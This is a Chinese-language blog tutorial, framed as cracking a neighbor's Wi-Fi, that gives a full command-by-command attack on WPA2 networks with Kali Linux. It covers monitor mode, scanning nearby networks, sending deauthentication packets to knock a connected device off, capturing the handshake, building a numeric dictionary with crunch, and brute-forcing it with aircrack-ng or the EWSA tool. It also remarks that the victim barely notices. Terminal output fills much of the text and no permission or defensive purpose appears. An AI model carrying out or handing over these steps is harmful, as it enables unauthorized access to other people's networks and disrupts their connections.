使用kali_linux实战破解邻居家wifi

首先回答下大家看完标题后心里想的疑问,我在此一一举例。

  • 1.不存在所有的wifi都能破解。
  • 2.能不能破解wifi首先要能抓到无线信号握手包,其次剩下的完全看字典。
  • 视频教程见最下方

教程开始

首先需要一张支持kali_linux的无线网卡,某宝一大堆 那我用的就是这两款了。

图片[1]-使用kali_linux实战破解邻居家wifi-颜汐小屋

插入USB网卡,识别kali_linux

图片[2]-使用kali_linux实战破解邻居家wifi-颜汐小屋

开启无线监听模式

打开终端,用airmon-ng命令查看

┌──(root?west2)-[~]
└─# airmon-ng 

PHY     Interface       Driver          Chipset

phy0    wlan0           rt2800usb       NetGear, Inc. WNDA4100

这里我们得知网卡名是:wlan0,于是用airmon-ng start wlan0开启无线网卡监听

┌──(root?west2)-[~]
└─# airmon-ng start wlan0

Found 2 processes that could cause trouble.
Kill them using 'airmon-ng check kill' before putting
the card in monitor mode, they will interfere by changing channels
and sometimes putting the interface back in managed mode

    PID Name
    567 NetworkManager
   1899 wpa_supplicant

PHY     Interface       Driver          Chipset

phy0    wlan0           rt2800usb       NetGear, Inc. WNDA4100
                (mac80211 monitor mode vif enabled for [phy0]wlan0 on [phy0]wlan0mon)
                (mac80211 station mode vif disabled for [phy0]wlan0)

输入iwconfig即可查看网卡状态 网卡名加了mon则表示成功

┌──(root?west2)-[~]
└─# iwconfig                                                                                   
lo        no wireless extensions.

eth0      no wireless extensions.

wlan0mon  IEEE 802.11  Mode:Monitor  Frequency:2.457 GHz  Tx-Power=20 dBm   
          Retry short  long limit:2   RTS thr:off   Fragment thr:off
          Power Management:off

Mode:Monitor代表已经正常开启监听模式。那么解除监听的命令是:airmon-ng stop wlan0mon(知晓就行)

搜索附近wifi

命令格式:airodump-ng wlan0mon,查看附近的无线信号。

┌──(root?west2)-[~]
└─# airodump-ng wlan0mon

 CH 11 ][ Elapsed: 6 s ][ 2022-02-02 23:54                                                     
                                                                                               
 BSSID              PWR  Beacons    #Data, #/s  CH   MB   ENC CIPHER  AUTH ESSID               
                                                                                               
 60:3A:7C:4D:F4:E8  -74        1       11    0  11  540   WPA2 CCMP   PSK  TP-LINK_F4E8        
 A2:9D:7E:7B:A9:BB  -41        5        0    0  11  720   OPN              <length:  0>        
 9C:9D:7E:7B:A9:BB  -41        5        0    0  11  720   WPA2 CCMP   PSK  9000                
 52:33:F0:1D:E5:AE  -65        6        0    0   1  324   WPA2 CCMP   PSK  <length:  0>        
 50:33:F0:6D:E5:AE  -65        7        0    0   1  324   WPA2 CCMP   PSK  Rizwangul           
 64:09:80:49:25:DB  -68        6        0    0  10  130   WPA2 CCMP   PSK  xiaozhuzhijia       
 80:12:DF:F5:26:FD  -70        4        3    0  11  360   WPA2 CCMP   PSK  203                 
 44:7B:BB:BF:89:80  -70        7        0    0   2  130   WPA2 CCMP   PSK  ChinaNet-XpfS       

解释:BSSID 为 wifi 的 MAC 地址,PWR 为信号强弱程度越接近1信号越强 ,#DATA 为数据量,越大使用的人就越多,CH 为信道频率(频道),ESSID 为 wifi 的名称,中文可能会有乱码

Ctrl+c停止搜索,方便复制记录要破解的bssid

开始抓数据包

命令格式:airodump-ng --bssid BSSID -c 信道频率 -w 抓包存储的路径 wlan0mon

┌──(root?west2)-[~]                                                                           
└─# airodump-ng --bssid 80:12:DF:F5:26:FD -c 11 -w /home/ wlan0mon
00:01:56  Created capture file "/home/-01.cap".                                                
                                                                                               

 CH 11 ][ Elapsed: 12 s ][ 2022-02-03 00:02                                                    
                                                                                               
 BSSID              PWR RXQ  Beacons    #Data, #/s  CH   MB   ENC CIPHER  AUTH ESSID           
                                                                                               
 80:12:DF:F5:26:FD  -69   0      100        3    0  11  360   WPA2 CCMP   PSK  203             
                                                                                               
 BSSID              STATION            PWR   Rate    Lost    Frames  Notes  Probes             
                                                                                               
 80:12:DF:F5:26:FD  E4:C4:83:1D:21:3F  -72    0 - 1      0        1                            
 80:12:DF:F5:26:FD  08:4A:CF:88:DC:83  -76    6e- 6    671       12                            
 80:12:DF:F5:26:FD  F4:BF:80:A5:4C:C8  -78    0 - 1      2        3                            

这里最下面几行 STATION: 该AP下的连接站 此处已经获取握手包,接下来选取其中的一段STATION 跟bssid,接下来会用到。

强制让用户断开wifi连接

解释:给连接到wifi的一个设备发送一个deauth(反认证)包,让那个用户设备断开wifi,随后它自然会再次连接wifi 整段过程用户几乎发现不了。

命令格式:airepaly-ng -0 10 -a bssid -c 连接到 WiFi的手机mac地址 网卡名(一般为 wlan0mon)

需要新开个终端,这里我们就输入:aireplay-ng -0 10 -a 80:12:DF:F5:26:FD -c 08:4A:CF:88:DC:83 wlan0mon

┌──(root?west2)-[~]
└─# aireplay-ng -0 10 -a 80:12:DF:F5:26:FD -c 08:4A:CF:88:DC:83 wlan0mon                    
00:34:11  Waiting for beacon frame (BSSID: 80:12:DF:F5:26:FD) on channel 11
00:34:12  Sending 64 directed DeAuth (code 7). STMAC: [08:4A:CF:88:DC:83] [ 0|43 ACKs]
00:34:13  Sending 64 directed DeAuth (code 7). STMAC: [08:4A:CF:88:DC:83] [ 0|44 ACKs]
00:34:13  Sending 64 directed DeAuth (code 7). STMAC: [08:4A:CF:88:DC:83] [ 0|12 ACKs]
00:34:14  Sending 64 directed DeAuth (code 7). STMAC: [08:4A:CF:88:DC:83] [ 0|15 ACKs]
00:34:15  Sending 64 directed DeAuth (code 7). STMAC: [08:4A:CF:88:DC:83] [ 0|10 ACKs]
00:34:15  Sending 64 directed DeAuth (code 7). STMAC: [08:4A:CF:88:DC:83] [ 0|16 ACKs]
00:34:16  Sending 64 directed DeAuth (code 7). STMAC: [08:4A:CF:88:DC:83] [ 5| 9 ACKs]
00:34:17  Sending 64 directed DeAuth (code 7). STMAC: [08:4A:CF:88:DC:83] [ 0|26 ACKs]
00:34:17  Sending 64 directed DeAuth (code 7). STMAC: [08:4A:CF:88:DC:83] [ 8|39 ACKs]
00:34:18  Sending 64 directed DeAuth (code 7). STMAC: [08:4A:CF:88:DC:83] [ 2|35 ACKs]

0 WiFi 设备无限次数,-0 10 则攻击 10 次。攻击原理是:先让设备掉线,设备会再自动连接,并发这个自动连接过程会进行三次握手,会发送 tcp 包(里面包含加密的密码数据),我方伪装成 WiFi 热点去窃取该数据包。我方窃取后即可用字典穷举法暴力破解加密的 WiFi 密码,数据包里面的密码是哈希加密的,哈希加密只能正向

等待握手包抓取成功

回到正在执行airodump-ng --bssid 80:12:DF:F5:26:FD -c 11 -w /home/ wlan0mon的终端,发现握手包已经抓取成功

┌──(root?west2)-[~]                                                                           
└─# airodump-ng --bssid 80:12:DF:F5:26:FD -c 11 -w /home/ wlan0mon                             
00:28:57  Created capture file "/home/-01.cap".                                                
                                                                                               

 CH 11 ][ Elapsed: 9 mins ][ 2022-02-03 00:38 ][ WPA handshake: 80:12:DF:F5:26:FD              
                                                                                               
 BSSID              PWR RXQ  Beacons    #Data, #/s  CH   MB   ENC CIPHER  AUTH ESSID           
                                                                                               
 80:12:DF:F5:26:FD  -71 100     3654      489    0  11  360   WPA2 CCMP   PSK  203             
                                                                                               
 BSSID              STATION            PWR   Rate    Lost    Frames  Notes  Probes             
                                                                                               
 80:12:DF:F5:26:FD  F4:BF:80:A5:4C:C8  -70    1e-24e     4     5780  EAPOL                     
 80:12:DF:F5:26:FD  E4:C4:83:1D:21:3F  -74    1e- 1      0     2152                            
 80:12:DF:F5:26:FD  B4:20:5B:D4:8E:EB  -74    0 - 1e     0      339                            
 80:12:DF:F5:26:FD  08:4A:CF:88:DC:83  -76    1e-24e     0     3592  EAPOL  203  

WPA handshake: 80:12:DF:F5:26:FD 终端右上角提示了WPA handshake代表握手包已经抓取成功,接下来就是配置字典文件的步骤。

使用crunch工具配置字典文件

关于crunch的使用配置方法在这里,感兴趣的朋友可以看看:

接着往下讲,打开终端 我们这里就配置个8位数 纯数字0-9的密码字典,这个字典来说的话不算大,暂时够用。

输入命令:crunch 8 8 0123456789 -o ~/1.txt

┌──(root?west2)-[~]
└─# crunch 8 8 0123456789 -o ~/1.txt
Crunch will now generate the following amount of data: 900000000 bytes
858 MB
0 GB
0 TB
0 PB
Crunch will now generate the following number of lines: 100000000 

crunch:  64% completed generating output

crunch: 100% completed generating output

等待片刻,它会生成一个858MBtxt文件到我们的root目录下,我们就配合用它来跑握手包。

两种方法暴力破解

1.aircrack-ng工具

01.先说第一种,aircrack-ng工具,aircrack-ng是比较传统的跑握手包工具了,速度慢的感人 但在kali_linux上只能用它了。

你在网上看到别人用aircrack-ng一秒瞬间破解wpa2密码,那纯属扯淡。他字典文件里就几个词,然后事先把wifi密码写进去。他们这么做是为了演示而演示。

命令:aircrack-ng -a2 -b 80:12:DF:F5:26:FD -w /root/1.txt /home/*.cap

解释:-a2代表着破解wpa/wpa2方式加密的参数,-b 的意思是路由器的bssid,-w是需要添加的字典文件路径,最后空格跟上.cap握手包文件的路径地址。


                               Aircrack-ng 1.6 

      [00:00:04] 22120/22369621 keys tested (6083.25 k/s) 

      Time left: 1 hour, 1 minute, 13 seconds                    0.10%

                       Current passphrase: 00022081                   


      Master Key     : B9 AE 51 E3 FE 9B 3B 7A FC 7F 88 9E 99 60 FE 1D 
                       A2 64 3C 5B 26 8B 47 62 55 31 51 BE 9A 53 E3 C9 

      Transient Key  : BC FB BC 88 87 78 5E 03 6D 43 B0 17 74 81 6E 08 
                       5C 94 B1 BD 80 D1 D6 67 6C 01 70 F8 74 40 05 15 
                       BD 2C CB C4 1A 15 87 CC BC 91 FE 7E D8 69 D7 65 
                       6E B3 0A B9 FA 37 26 98 C2 A6 BB 45 FA 56 0A C0 

      EAPOL HMAC     : 74 56 5C CE 00 33 A6 95 80 31 CF F1 D5 29 EA 31 

一跑,就花了50分钟…

图片[3]-使用kali_linux实战破解邻居家wifi-颜汐小屋

解释:Time left:代表跑完当前字典所需要的剩余时间,而最上面显示的是用时时间,右边keys tested(6186.62K/s)是每秒跑包的速度。

02:EWSA工具

02.EWSA工具全称则为:Elcomsoft Wireless Security Auditor,这是由国外俄罗斯一家公司推出的一款小巧强大的无线网络wifi密码破解软件,号称可以利用GPU的运算性能快速攻破无线网络密码,运算速度相比使用CPU可提高最多上百倍的软件。同时EWSA的主要原理是利用密码字典来包里破解无线wifi中的wpa和wpa2密码。

下载地址我分享出来了,评论即可查看。

安装之后 打开,在软件上方options里选择简体中文为默认语言即可,剩下的都是可视化操作,较为简单 只需要导入.cap文件 再加上我们前面用Crunch工具生成的字典,配合跑握手包即可,视频里都有讲。

图片[4]-使用kali_linux实战破解邻居家wifi-颜汐小屋

同一个握手包,同一个字典文件,全过程仅花了4分钟,这下知道该用谁了吧?、

视频教程

© 版权声明
THE END
喜欢就支持一下吧
点赞8打赏 分享
评论 抢沙发

请登录后发表评论

    暂无评论内容